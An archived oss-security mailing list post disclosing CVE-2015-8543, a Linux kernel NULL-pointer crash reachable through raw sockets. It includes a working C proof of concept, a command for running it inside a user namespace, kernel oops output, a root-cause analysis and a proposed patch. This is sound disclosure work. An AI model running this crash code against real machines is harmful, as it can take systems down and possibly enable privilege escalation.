Headline
CVE-2015-8543: oss-security - Re: CVE request - Android kernel
The networking implementation in the Linux kernel through 4.3.3, as used in Android and other products, does not validate protocol identifiers for certain protocol families, which allows local users to cause a denial of service (NULL function pointer dereference and system crash) or possibly gain privileges by leveraging CLONE_NEWUSER support to execute a crafted SOCK_RAW application.
- Products
- Openwall GNU/*/Linux server OS
- Linux Kernel Runtime Guard
- John the Ripper password cracker
- Free & Open Source for any platform
- in the cloud
- Pro for Linux
- Pro for macOS
- Wordlists for password cracking
- passwdqc policy enforcement
- Free & Open Source for Unix
- Pro for Windows (Active Directory)
- yescrypt KDF & password hashing
- yespower Proof-of-Work (PoW)
- crypt_blowfish password hashing
- phpass ditto in PHP
- tcb better password shadowing
- Pluggable Authentication Modules
- scanlogd port scan detector
- popa3d tiny POP3 daemon
- blists web interface to mailing lists
- msulogin single user mode login
- php_mt_seed mt_rand() cracker
- Services
- Publications
- Articles
- Presentations
- Resources
- Mailing lists
- Community wiki
- Source code repositories (GitHub)
- Source code repositories (CVSweb)
- File archive & mirrors
- How to verify digital signatures
- OVE IDs
- What’s new
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 9 Dec 2015 16:37:26 +0100 From: Robert Święcki <robert@…ecki.net> To: oss-security@…ts.openwall.com Subject: Re: CVE request - Android kernel - IPv6 connect cause a denial of service
This also works under modern Linux kernels - and the SOCK_RAW socket can be created with namespaces.
$ ~/src/nsjail/nsjail -Mo --user 0 --group 0 --keep_caps --chroot / – /bin/sh -i sh-4.3# /home/test/a
[ 513.294978] BUG: unable to handle kernel NULL pointer dereference at (null) [ 513.294990] IP: [< (null)>] (null) [ 513.294995] PGD 70579e067 PUD 70e0f7067 PMD 0 [ 513.295001] Oops: 0010 [#2] SMP
Tested with:
$ uname -a Linux ABC 4.2.0-18-generic #22~14.04.1-Ubuntu SMP Fri Nov 6 22:20:11 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
2015-12-09 11:15 GMT+01:00 郭永刚 <guoyonggang@…cn>:
POC: #include <linux/types.h> #include <stdlib.h> #include <stdio.h> #include <sys/stat.h> #include <fcntl.h> #include <errno.h> #include <pthread.h> #include <sys/socket.h> #include <sys/un.h> #include <netinet/in.h> int main(void){
int socket\_fd; struct sockaddr\_in addr; addr.sin\_port = 0; addr.sin\_addr.s\_addr = INADDR\_ANY; addr.sin\_family = 10; socket\_fd = socket(10,3,0x40000000); connect(socket\_fd , &addr,16); return 0;}
Analysis of causes: In the file net/ipv4/af_inet.c , It will cause pc is 0x0 , if the sk->sk_prot->get_port is NULL. static int inet_autobind(struct sock *sk) { struct inet_sock *inet; /* We may need to bind the socket. */ lock_sock(sk); inet = inet_sk(sk); if (!inet->inet_num) { if (sk->sk_prot->get_port(sk, 0)) { release_sock(sk); return -EAGAIN; } inet->inet_sport = htons(inet->inet_num); } release_sock(sk); return 0; }
Solution:
Add check as follow: if (sk->sk\_prot->get\_port &&sk->sk\_prot->get\_port(sk,0)) { release_sock(sk); return -EAGAIN; }
– Robert Święcki
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.